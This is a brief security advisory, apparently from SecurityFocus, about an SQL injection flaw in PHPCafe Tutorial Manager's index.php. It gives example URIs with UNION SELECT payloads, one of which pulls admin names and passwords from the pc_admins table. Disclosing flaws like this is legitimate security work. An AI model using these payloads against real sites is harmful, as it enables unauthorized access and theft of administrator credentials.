PHPCafe Tutorial Manager Index.PHP SQL Injection Vulnerability

No exploit is required.

Example URI have been provided:

http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id='[SQL]
http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,name,name%20from%20pc_admins/*
http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,pass,name%20from%20pc_admins/*


 

Privacy Statement
Copyright 2010, SecurityFocus